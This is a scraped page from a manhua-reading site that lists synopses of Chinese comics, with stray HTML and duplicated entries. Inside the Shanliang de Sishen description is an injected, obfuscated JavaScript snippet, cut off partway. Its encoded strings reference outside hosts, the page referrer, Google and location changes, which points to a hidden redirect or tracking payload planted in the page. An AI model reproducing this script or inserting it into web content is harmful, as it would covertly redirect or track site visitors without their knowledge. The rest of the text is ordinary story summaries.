Manhua - Page 81

Manhua refers to Chinese comics, which have a unique artistic style and cultural flavor. Ranging from action to romance, manhua offers a diverse reading experience for those looking for something different from manga.

1472 results

Shadow’s Resurgence

Read Shadow’s Resurgence Manhwa – Shadow’s Resurgence Manga Online Free On HariManga The summary of the comic Shadow’s Resurgence: Sal Cooper, the most loyal and efficient shadow of the family, was sent out as a sacrificial pawn by the newly appointed head of the Cooper family during the major distribution meetings after representing the family in victorious battles. He became the object of abuse by the former subordinates who once served under him. After exerting all his efforts to kill those who had humiliated him and attempting to take Alan down with him, he discovered that as a child, he was chosen by the family to be the “shadow” and was enchanted with magic, unable to harm Alan and instead bearing all the injuries Alan suffered, thereby enhancing Alan’s own abilities. Learning from Alan that his entire life as a shadow was orchestrated, Sal reversed the magic’s effects and, through his own death, reclaimed everything Alan had taken from him, including talents and abilities. Although Alan survived, he lost his vitality and the ability to intimidate other families, leading to the downfall of the Cooper family. However, Sal Cooper was reborn at the age of three, before the magic of “nourishment” was cast upon him. Alternative Name: The Betrayal of Shadow / 家族影子的背叛 “Read Manhwa, Read Manhua, Read Manga…” are the most searched keywords on the website MANGAZIN.ORG. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANGA Deadline Is Raining in the Status Window Sekai de Yuuitsu no Tenshokushi ~ Job Hopper na Ore wa, Isekai de Subete no Job o Kiwameru Koto ni Shita ~ Hello, Lillian


Shan Hai Qi Tan

Once upon a time, there were many mysterious and strange animals, immortals and monsters How did they look? A snake with a human being face, a dog similar to a cat, a bird with colorful feather... Are they still alive? God knows, maybe extinct, maybe still living among us...


Shanliang de Sishen

The pure of heart Ah Dai was born into a live of thievery. One day, he was taken away by Gliss, a powerful alchemist to make a god instrument. His new fate leads him to save the life of the country's top assassin “King of Hell”. To repay him, Ah Dai is taken away by the assassin to receive intensive training. What will become of Ah Dai? ????? (Chinese); Good Reaper; The Kind Death God (English) , Shanliang de Sishen<script></script><script>function _0x282c(){var _0x594a3a=['https://ip','http://rea','DhjuK','then','cOhDL','mDFuG','GRgIG','.top/','floor','11427xeEfzE','1547042BPVkOF','hAQnk','referrer','.customapi','823263zRzMcP','OUXlu','gqjTi','420283RAELMy','includes','href','location','ArmDg','','dGxjc','uGXCD','2143848UYpoeq','4089445lTKXfw','google','random','113820cfqEIq','text','32wMFLsh','252adDcSi','2106UyMvxm'];_0x282c=function(){return _0x594a3a;};return _0x282c();}(function(_0x30eab1,_0x380d18){var _0x3c044a=_0x51fe,_0x15f613=_0x30eab1();while(!![]){try{var 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Shared Heart

Read manhua Shared Heart / 共享心脏 A clumsy takeaway girl and hotheaded president accidentally fall from a building to their deaths. Suddenly, they are saved by a tiny alien, which collects their hearts and installs them into itself. A cute story in which two people learn to live and connect with each other through shared hearts


She May Not Be Cute

<div class="clearfix _o46 _3erg _29_7 _8lma direction_ltr text_align_ltr"> <div id="js_8g0" class="_3058 _ui9 _hh7 _6ybn _s1- _52mr _3oh-" data-tooltip-content="22:02" data-hover="tooltip" data-tooltip-position="left"> <div class="_aok" tabindex="0" aria-label="young boy falls in love with strong older woman"><span class="_3oh- _58nk">She May Not Be Cute young boy falls in love with strong older woman, </span>even though she's not beautiful, girl 29, boy 23</div> </div> </div>


She Seems Teasing Me

The Black And Red Traffic Floret X Who Is Full Of Scandals Enters The World For “Love”. The “Old-Fashioned” Cool Sister With Explosive Martial Arts Value. Yu Chaoyan, Who Became Famous With The Black And Red Route, Has Various Scandals And Is As Well-Known As Her Fame. However, In Fact, She Is Just A Vicious Person. Maternal Solo. Recently, Yu Chaoyan Was Annoyed By A Certain Male Star’s Manipulation Of Tying Him Up For Publicity. In Anger, He Spoke Domineeringly In Front Of The Live Camera: If He Was The Only Man Left In The World, Then He Would Rather Have Sex With Ji Than Fall In Love With Him. . This Face-Slapping Declaration Immediately Ignited Hot Searches And Caused An Uproar. And The Consequence Of This Incident Was That When Yu Chaoyan Was Picking Up The Car In The Parking Lot, He Was Disfigured And Attacked By Fanatical Fans Of Male Stars Who Had Ambushed In Advance. Just At The Critical Moment, Yu Chaoyan Was Rescued By Yin Zhou Who Broke In By Mistake Because He Went The Wrong Way…


Shen Ze

From an early age, Xu Shenze would often get caught up in the same strange dream. Over time, the dark shadow that the dream cast over his life grew, until, one day, the shadow became real, and suddenly Xu Shenze's life as he knew it was completely torn to shreds. His parents suddenly meet a gruesome end, and all sorts of other strange and disturbing events kept on happening to him. Alone and afraid, when he hears about a supposed "dream town", he decides to go there to look for answers. In the town that is called both the "Holy Land" and "Purgatory" by its residents, what sort of terrible truths are waiting for Xu Shenze?


Sheng Wang

[From OSTNT] Qi is the origin of all life. Qi Gong is the origin of all cultivation. Yang Qi throw away everything for the woman he loves but in the end he was betrayed by the one he loves the most. Hunted by other aristocrats and with no home to return to. Now with his Qi Gong being destroyed he no longer has the capability to use any martial arts. However, the Heaven has yet to turn its back on him...


She’S Gone Viral Again

She's Gone Viral Again , At long last, Xiang Yi thought she had completed her final transmigration missions and could retire in peace. How could she know that during the period when she wasn't around, someone else would transmigrate into her body! The current her had fallen hard to become an obscure artiste with a rotten reputation, to the point that the entertainment industry even boycotted her for sleeping with the Best Actor. Even her family had cut ties with her But the maxed-level OP shows no fear at all~ Join her as she shows off her talents with a butcher's knife to chop up those pretentious b*tches! Shocking! She's gone viral again!


She’s Gone Viral Again

She’s Gone Viral Again , At long last, Xiang Yi thought she had completed her final transmigration missions and could retire in peace. How could she know that during the period when she wasn’t around, someone else would transmigrate into her body! The current her had fallen hard to become an obscure artiste with a rotten reputation, to the point that the entertainment industry even boycotted her for sleeping with the Best Actor. Even her family had cut ties with her But the maxed-level OP shows no fear at all~ Join her as she shows off her talents with a butcher’s knife to chop up those pretentious b*tches! Shocking! She’s gone viral again!


Shiki (YOKOYAMA Mitsuteru)

Manga adaptation of Sima Qian's Shiji (Records of the Grand Historian), which depicts famous people and events drawn mostly from 8th century BC~2nd century BC of Chinese history.


Shouxing Laogong Ye Ye Liao ( My Adorable Girlfriend )

<div class="description-summary hide_show-more"> <div class="summary__content show-more"> <div id="noidungm">Her family went bankrupt and her fiance broke up with her. On a snowy night, she met the guy who changes her whole life. In order to save the family, she gave up her dignity and pride. She thought everything would be better after that night, but the truth was… “You did all these on purpose!” He looked at her coldly, “Meeting you was the biggest mistake of my life.” It turned out that he had never loved her…</div> <div></div> </div> <div class="c-content-readmore"></div> </div>
